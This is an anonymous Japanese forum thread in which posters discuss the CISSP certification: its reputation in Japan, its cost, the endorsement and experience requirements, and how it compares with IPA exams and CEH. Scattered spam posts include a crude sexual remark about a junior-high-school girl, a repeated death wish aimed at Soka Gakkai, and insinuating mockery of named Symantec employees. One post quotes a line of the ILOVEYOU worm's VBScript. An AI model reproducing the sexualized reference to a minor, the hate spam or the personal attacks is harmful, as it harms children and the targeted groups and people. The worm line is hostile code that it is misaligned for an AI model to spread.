【資格】CISSP
CISSPについて情報交換しましょう!
●CISSPとは
(ISC)2(International Information Systems Security Certification Consortium)が認定を行っている国際的に最も権威あるセキュリティ専門家認証資格です。
●(ISC)2
https://www.isc2.org/japan/ >>107
セキュリティ系のカンファレンスの講師でもそんなに持ってる人は多くない
ttps://reg.cmptech.jp/public/application/add/236?lang=ja
資格なんかなくても大丈夫って考えられるし、
普及してないとも考えられるし。 >>109
資格なんてなくても大丈夫っていうほどのものなんだよ。CISSPって。
所詮そこまでのもの。
これ取っても意味ねーよ。IPAの情報セキュリティスペシャリストの方が評価される。 >>112
SUはねえよw
今はISMS審査員とかだろ。 ISMS審査員なんてCISSPよりも評価されない。
だって受講すれば誰だって合格できる代物。 CISSP持ちです。
今日IPAのSCうかった。SCは合格率が16%だそうな。
かなり高い。うーん。
でも、SCは誰でも知ってるから話の種にならないけど、
CISSPはあまり知られてないから、その分話の種になる資格ではあるよ。
面接などのネタ作りには適してると言えると思う。
まぁ、費用対効果を考えると泣けるし、
かといって費用対効果を考えないCISSPはCISSPに値しないし、
なんともかんとも、もにょる感じだけどね。
まぁ、近い将来報われるとうれしいなっとおもって頑張ってるよ。 Pマーク審査員どうよ?
取得者が圧倒的に少ないんだが・・・
ISO審査員 2万人 10万社取得
ISMS審査員 5千人 3千社取得
Pマーク審査員 8百人 1万社取得 CISSPをとろうと思って海外の同僚に聞いたら、
EC CouncilのCEH(Certified Ethical Hacker)の方が実践的でオススメと言われました。
どなたか持っている方いますか?
●全世界にウ○ツキ評価を公表している機関の(おまけにそれもトップページ)
会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々
■http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal ←スポークスマンぽい!?
ほいじゃあ印をジカリンで(微笑)
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg ←検出技術を開発したりなど技術畑の人(その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?)
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri ←只のカバン持ち!?
*Zulfikar Ramzan →超注目!!★現Architect and Technical Director職★
→顔(ジカリン) ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest ←ググルと(記述: Candid Wueest)といっぱい出てくる人
→顔(当日の当人) ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
(ネクタイスーツで昼間から飲んじゃうお呼ばれの酒はサイコーだぜ)
2009年9月ジュネーブ会議にて
●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM
Martin Overton さん ※ 出張届・出張報告書受理
●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
(アメリカンインターナショナルグループ:アメリカ合衆国ニューヨークに本拠を置く保険会社)
の、おそらく社内セキュリティ担当かなんかの人
Pascal Lointier さん ※ 出張届・出張報告書受理
(Rev.8.2)ノートン警察()笑 http://www.youtube.com/watch?v=FnEYTf3zyMk >>119
まあ一通り仕事覚えたうえで上司の指示か許可を得て取った資格ならな
無職のくせに何か勘違いして資格だけ取っちゃった奴は例外なく無能 まんこのにおい……
なめたことあるからおれ知ってるもん
ver. jc 2 年生おまんこ (とろける舌触り) サイコー >>127
思えちゃうのではなく、実際に資格商売なのだ。
しかし、ベンダー資格と呼ばれてるものの多くは資格商売になっている。
CISSPの場合、あまりに露骨なのと、実際にこの資格をもっていても
一般的なベンダー資格と比べて知名度も低いし、役にも立たない。
俺ももってるが、今まで取得した資格の中で一番無駄だったと思ってる。 >>127
業務上必要だから受講費用も出張費も会社持ちだしそれ故それほど苦でもない。 資格商売だからって、悪いわけじゃない。
問題は価格に見合うかと言うこと。
日本ではcisspは見合わない感が大きいけど。
ホルダとしては、価格に見合う様にISC Japanもっとちゃんと働けと言いたいな。
外資相手にはネームバリューがあるんだが。 >>132
外資といってもUSでなく、キムチだろ? なんだっけ?維持するためのポイント稼ぎで日経雑誌の定期購読が
ポイント付与の対象になっているのには唖然とした。
>>133
古い煽りにマジレスするのもなんだが、ISCは米国だよ。
んで、外資ウケはいい。
外資の取引先との名刺交換や、展示会のガイジンとの名刺交換、
うちの会社の米国ブランチなんかと名刺交換の際には、
「オメーCISSPカヨ(英語)」と必ず言われるけどね。
ただ、日本では誰も知らない。ISC Japanもっと仕事しろよと。
45ドルのウインドブレーカーは結構便利で、それだけでも大満足です。
…なわけがない。
C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.VBS") こんなカスみたいな資格輸入したの誰だよ。 河野か。 セキュリティ業界のキャリア形成と資格の関係【前編】
情報セキュリティ資格だけで転職や昇進ができるかキャリア形成の一環として、
認定資格の取得に励む情報セキュリティ担当者は多い。
ただし、資格取得が就職や転職、昇進に直結するという考えは、もはや幻想かもしれない。
http://techtarget.itmedia.co.jp/tt/news/1207/27/news08.html ベンダー中立の組織や一部のセキュリティベンダーが、収益源になり得る有望な
ビジネスとして認定資格制度に目を付けるようになってから、認定資格の話題に
一層注目が集まるようになった。 今日、情報システムのセキュリティ専門家を認定する「CISSP(Certified Infor
mation Systems Security Professional)」の取得者は8万人、情報システムの監
査専門家を認定する「CISA(Certified Information Systems Auditor)」の取得
者は6万人に上る状況であり、認定資格に対する熱狂は一向に収まる気配がない。 ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
まだ学生で取れないけど、いずれは取りたい。
CompTIAのSecurity+取ったけど、本当に実務経験4年で取れるんかな。 情報セキュリティスペシャリストとどっちが難しいんだろう? 勉強の質が違う。セキュリティスペシャリストは実際の構築経験、ベンダー知識、技術知識がものをいうけど、
CISSPは優先順位、バランス感覚などのセキュリティの考え方が問われる。どちらも難関。 ここ8年ガチでフリーなんだけど実務経験ってどうやって認定するの? 試験難易度については、情報セキュリティスペシャリスト、情報セキュリティアドミニストレータの方がよほど上だよ。
この試験は、情報処理技術者試験で補えない時事的な部分を補完するための試験って印象で、学習量はずっと少ないと思うけど。
でも行政でこの試験を推してるならヴァカ以外の何者でもない。 そんなにdisりたいなら、こんなところじゃなくてもっとメジャーなところで叩けばいいのに。
そういうところへの足がかりがないからこそ、叩き潰したいのだろうけどね。
ただ、弱者は弱者らしくしたほうがいい。
実際、国内企業でも、標準化などの海外とやりとりするばあいは、確実にあったほうがいい。
そのかわりホルダとわかると、もれなく英語ができると思われてネイティブスピードで話しかけられることになるが。 日本語試験受けた場合は名刺に CISSP(日本語)と書くべき >>151
遅レスだけど。
resumeは自分が社長なので問題なし。
endorsementはISC2有資格者の知り合いにもらった方が楽。
いないなら、このendorserいない版の大量の職務経歴書を書いてISC2にendorseしてもらう。
https://www.isc2.org/endorsement-form.aspx あの試験は合格しても答えがわからんからモヤモヤすんよ HCISPP取りたいけど病院で働いた経歴が要るから諦めかけてるナウ(´・ω・`) 初の日本人HCISSPを目指してがんがれ(´・ω・`) ちなみに、CSSLPは日本人取得者○人いる(`・ω・´) CISSPってセキュリティ専門家としての実務経験4年以上が要るんだね(´・ω・`)
受ける前から前提条件の難易度高すぎて挫折しそうナウ(´・ω・`) CISSPとSSCPの学習領域のガイドブックが公式サイトにて公開されました。
高いお金がかかる公式セミナー受ける余裕がない人は、このガイドブックに記載されている用語を片っ端からネット検索して学習するだけでも、相当はかどると思います。
https://twitter.com/ISC2_Japan/status/739663505771646976 2年ほど前にCISSP認定受けてみて、日本での認知度の低さをしみじみと感じてる。
そりゃ、公式セミナーが高すぎる、認定試験の代金が高すぎる。参考図書がほとんど無い。
(ISC)2があまり宣伝に力入れてないで、仕方ないところはあるが。
(ISC)2の英語圏の活動はそりゃ活発なもんで、公式サイト(英語)を見ると、
様々なイベント主催、交流会、ウェビナー、グッズの販売、メディアへの露出と、
自分たちが情報セキュリティーの業界を背負っていくんだという気概と、
社会的に認められ、影響力を持ち、情報セキュリティの専門家の経済的な待遇を良くしていこうという政治的なロビー活動が強く伝わってくる。
アメリカ人はこの手の組織運営は本当に卓越している。 CISSP認定者の米国の給与取得水準の統計。
大体、年収10万ドル〜12万ドル程度という結果。
日本じゃどうかは知らないけど、自分や周囲の認定者を見る限り、まぁ似たような水準だね。
http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/CISSP-Median-Slary-By-City.png
前どこかでCISAやPMPやGIAC、COMPTIASecurity+の給与水準の統計と比較されたページを見たんだけど、どこ行ったっけな? >>172
おお、こんなんあるんか九州在住だし試しに受けてみよっかな
勿論九州在住とはいえ被災地ではないので募金はさせていただきます CISSP取得した勢いで、情報セキュリティスペシャリストとCompTIASecurity+を受けてみたけど、
それぞれ一か月程度、週末だけ勉強の流れで、あんまり勉強せずに受かった。
このまま秋に合格率8割と言われている情報セキュリティマネジメントも全部取ってしまおう。
冬にはCISAの準備もせにゃならん。今年は情報セキュリティずくしの一年で終わりそうだ。 >>178
CISSPって既に持ってる人から紹介してもらわないといけないってマジなの? >>179
私が取ったときは、先人のエンドースメントが必要だったけど、最近はいらなくなったという話を聞いたことがあるような。
ISC2にきくよろし。 >>179
エンドースメントの申請書、履歴書、現職の雇用証明書、大卒キャリア使うなら卒業証明書をセットでISC2に申請。ISC2自身がエンドースメントしてくれる。提出書類は全部英語で。 >179
合格後の手続きは以下の通り。
推薦状ない人用の手続きも一応ある。
具体的に書いてないけどおそらくは厳しい身元と経歴の調査があるのだろう。
https://www.isc2.org/japan/cissp_regist.html
セミナー講師に質問した事があるが、日本以上のコネ&学歴社会であるアメリカでは
推薦状が用意出来ない人は信用してもらえない。
これは「信頼の輪モデル」に基づき、数学的にリスクが高まる事が証明されているからだと云々。
公開鍵証明だけではなく、人間までも「信頼の輪モデル」なのかよと、
アメリカ人の合理性に感心すると共に、あいつらやっぱり畜生アンド畜生だと再確認した。 >>182
そのセミナー講師が何者か知らないけど、現に知り合い無しでISC2から認定もらってるので、経験談としてそこまで閉鎖的な資格じゃない。
エンドースメントの書類、英語の履歴書、雇用証明書、大卒キャリアで申請するなら卒業証明書、これらをセットで送れば、書類に不備がない限り認定はおりる。
申告する職歴中に転職している場合は、過去の職場からも在籍証明が必要なので面倒。自分の場合は転職してないので、人事に雇用証明書を発行してもらうだけだった。
日本のISC2からは、在籍確認の問い合わせがUSから上司に来るかも知れないと言われていたけど、全く問い合わせ無し。ここは運かも知れないので、一応上司には相談しておいた方がいい。 >>184
ここで言うからには、>>182のいうセミナーとは、多分ISC2公式のセミナーではないかと。
んで、多分>>182とあなたが言うのは両方正しくて、以前は閉鎖的だったけど、メジャーになって今はニューカマーにも門戸を開くようになったのではないかな?
以前は、ツテのない人は公式セミナー講師とかISC2 Japanの関係者のお世話になることもあったと聞いたことがあるよ。
まぁ、オッサンの昔話ですわ。 2015の終わりに認定受けましたが、エンドースメントは必要ですよ〜
CISSPの知り合いにエンドースメント書いてもらって、上司に業務実績証明書類書いてもらって、大学の卒業証明 等、関係書類揃えてISC2に申請してから、認定証がくるまで約3ヶ月かかった・・・かかりすぎorz
聴いた話ですが、CISSPの認定者にエンドースメントしてもらわないと、ニューカマーも認定してもらえるものの、さ・ら・に手続きがめんどくさいらしいのは昔から変わらないようです。 マジかw
派遣上がりのオッサンがSC受かった後、次に目指すものとしてCISSPを狙ってたが、猛勉強しても取得出来るものではないんだな 学部でてからどのへんに就職すりゃ4年後会員なれんのよこれ 8ドメインに絡むフルタイムの仕事ならなんでも良いと思うがね。 CISSPはどうせ範囲が広くて、どんな仕事をしていても業務知識だけで合格ってそうないから、
就職先はあまり気にしないほうが良いと思うよ。
通信系、セキュリティ分野の上流設計、ガバナンス系の職種に就いていれば実務から
類推しやすいこともあるだろうけど、8ドメインカバーする仕事なんてそうないだろうし、
ガバナンス系の仕事って新人は割り当てられることも少ないだろうしねぇ。
なので、職種よりもどう勉強するかが大切だと思うよ。
新人の頃から計画的に取るぐらいのモチベーションがあるのなら、
貯金して自費で公式セミナー受けることのほうが、実は案外おすすめなのかもしれない。 189は単に経歴証明の話をしてるんじゃないかなあ。まあどちらでもよいけど。 >>194
試験会場によるので、いつでもではない。
ピアソンVUEのサイトを見るよろし
ttps://www.pearsonvue.co.jp ISC2のHPを見ても今一つよくわからなかったので
受験〜認定までの流れについてどなたかご教示頂きたいのですが、
・ピアソンのHPから試験申し込み(受験までその他に特にやることは無し)
・受験(持参するのは免許証+署名有りのクレカ)
・合格後、ISC2よりメールが届く(提出物2つのフォーム+記入サンプル添付?)
エンドースメントを推薦者(認定者or勤務先の上司)に記入してもらう
英文職務経歴書を自分で記入
・上記2点を提出
・監査対象になれば経歴詳細記入して送る
という認識で合っておりますでしょうか?
ネット上で調べていたところ、24P程の申込書のようなものもあり
どれが必要なのか困惑してしまいました。。。 >>196
あってると思うが、今は英語のサイトに行くと海外ではオンライン登録になっているよ。
日本のISC2に確認した方がいいよ。
https://www.isc2.org/endorsement.aspx 参考書にCISSP ALL IN ONE EXAM GUIDE
の購入を予定しているのですが
最新版でなく古いタイプのものでも試験に十分対応できますか?
Third Editionで安いのを見つけたので
良さそうならそれを購入しようかと思っています そのテキストは使ってないので、何ともいえませんが、試験は最新技術を問うのではなく。
答えを出す考え方が重要視されるので、昔のテキストでもよいと思います。
そもそも日本語の公式ガイドが大昔の発行のものしかありませんし。 認定は置いといて、特に書かれてませんが受験資格に年齢は関係ないですよね?
来年高校生ですがSCが受かったのでいま勉強中です。
廻りに受験する友達がいないのでここで聞くことしかできず。 年齢は関係ないだろうけど、実務経験はないだろうから合格しても準会員になるんだろうね。
実務経験(フルタイム勤務が前提ね)を積んで正会員になるには確か期限があったような。
大学にも行くならまだ当面はフルタイムでは働かないだろうから、そこはちゃんとルールを見ておいた方がよいよ。isc2の日本支部に問い合わせても回答してもらえると思う。
しかし高校生か、すごいなあ。。。 見直したら、まだ中学生ってことね。なおさらすごい。。 >>201
教えて頂きましてありがとうございます!
準会員目指してまずは基礎を固めたいと思います。
中学や高校でCERTを立ち上げるのが目標です。生徒なので立ち上げ支援まででしょうけど😎 中学や高校でそんつまらんことすんなよw
青春ど真ん中なんだからさ
恋愛に遊びに勉強にスポーツに全力で励んでおもくそ青春謳歌した方が遥かにいいし、今後の人生も輝くぞ
そしてそういう奴の方が評価される、青春時代のコミュニケーションによって人間性の土台ができ原石が磨かれるからな >>203
SSCPなら実務経験一年。
最近は日本語試験あるんだっけ? 中学でSCてさすがにネタだろ
CSIRTなら誰でも立ち上げられるし べつに恋愛や遊びを捨てる必要もないだろうw
文章見る限り頭も良さそうだし学生向けCERTというのはいいんじゃないの